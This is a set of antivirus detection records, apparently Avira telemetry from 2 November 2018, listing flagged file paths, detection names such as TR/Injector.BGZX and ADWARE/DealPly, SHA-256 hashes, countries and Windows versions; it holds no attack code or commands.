  Row(detection=Row(filename='avscan-20181102-050323-983fc1e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050323-983FC1E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bank.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\BANK\\BANK.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155120-8b93b40e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-155120-8B93B40E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061408-7a9a5f55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061408-7A9A5F55', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055300-86bec1e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055300-86BEC1E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bookmarks.pvp', filepath='\\\\?\\D:\\Users\\X\\Windows Software\\PDF XChange Editor 5.5.312.0 Multilingual.tt7z.com\\x32\\CK x86\\Plugins.x86\\Bookmarks.pvp', filesize=320000, name='HEUR/APC.#M1.#R1'), hash='609bfd702b15a22dd5b3e5b8a90f798713c01cd6562df9c005843478b3adcfab', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:20:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133810-bf078727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133810-BF078727', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:41:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154733-616cc1fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-154733-616CC1FE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:50:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050724-27e08ad7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050724-27E08AD7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-02T08:43:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054532-7bbe90c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054532-7BBE90C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054224-0bc35e4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054224-0BC35E4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054517-72ed011c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054517-72ED011C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053124-82756a4d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053124-82756A4D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pjjaumwu.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\pjJAumWu.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145604-237bc61d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-145604-237BC61D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143745-5744607d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143745-5744607D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-223433-4a51bab4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cc160031\\AVSCAN-20181101-223308-3C0F516C\\AVSCAN-20181101-223433-4A51BAB4', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='4f505ca422d8fb8c70caf2c16671c84cae98f7cb77ae4486da13901fe0897c18', metadata=Row(cmdline=None, country='DO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:34:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122335-aef1bfe3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06c2cece\\AVSCAN-20181102-122228-A5F8B5FA\\AVSCAN-20181102-122335-AEF1BFE3', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='NG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:23:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mcmvqijp.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\MCMvqIJP.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120225-0030746b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120225-0030746B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054008-ba4b9ffe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054008-BA4B9FFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053949-af572d7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053949-AF572D7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061939-3f7c0009', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061939-3F7C0009', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062451-fa007835', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062451-FA007835', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050931-73c8556b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050931-73C8556B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052404-7bee9ab5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052404-7BEE9AB5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054941-10557798', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054941-10557798', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054751-ce6ce0ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054751-CE6CE0AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055313-8e1f74aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055313-8E1F74AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052451-98057e3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052451-98057E3B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053526-12b3fec8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053526-12B3FEC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060853-bea1ec23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060853-BEA1EC23', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053924-a0478da7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053924-A0478DA7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054018-c072bc39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054018-C072BC39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053001-50e679f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053001-50E679F5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055007-1fc4c44f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055007-1FC4C44F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060038-976b3ebd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060038-976B3EBD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050434-c25cf436', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050434-C25CF436', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053005-5351cb0b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053005-5351CB0B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053017-5a0aab39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053017-5A0AAB39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062511-05ad528a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062511-05AD528A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060559-573396a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060559-573396A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062536-1440c206', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062536-1440C206', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050553-f1d9d159', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050553-F1D9D159', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062440-f2f1928d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062440-F2F1928D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054957-1967da2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054957-1967DA2F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053414-e7a17591', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053414-E7A17591', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052613-c8db89cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052613-C8DB89CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055726-254d4da3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055726-254D4DA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_1a823b1a.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_1a823b1a.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:09:43Z'), dt=datetime.date(2018, 11, 2)),
